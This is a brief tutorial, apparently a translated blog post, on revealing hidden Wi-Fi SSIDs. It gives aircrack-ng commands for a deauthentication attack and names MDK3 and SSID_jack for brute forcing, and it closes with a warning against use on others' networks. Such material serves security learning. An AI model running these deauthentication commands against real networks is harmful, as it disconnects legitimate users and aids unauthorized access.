There are several ways to reveal a hidden (cloaked) SSID:
- Waiting for a client to connect to the AP and authenticate
- Deauthentication attack
- Brute Force SSID
# Waiting for a client to connect to the AP and authenticate:
This takes a long time.
# Deauthentication attack:
To be faster, I usually set my Wi-Fi card to the channel of the target AP whose SSID I want to see.
- airmon-ng start [interface] [channel]
- airodump [interface] [filename] [channel]
- aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY [interface]
Description:
-0 1 = attack mode (deauthentication)
-a XX:XX:XX:XX:XX:XX = MAC address of the AP
-c YY:YY:YY:YY:YY:YY = destination MAC address
interface = ath0
Then check the airodump capture after running aireplay-ng. Within seconds (I don't know how many seconds, I have never counted :) ) the target SSID appears.
For more details, refer to the manual: aireplay-ng --help
# Brute Force SSID:
Some attackers use tools such as MDK3.
SSID_jack is also able to uncloak a hidden SSID.
Closing:
Do not do this on networks owned by others.
Courtesy : http://adekrina.blogspot.com/2008/08/cloak-hidden-ssid.html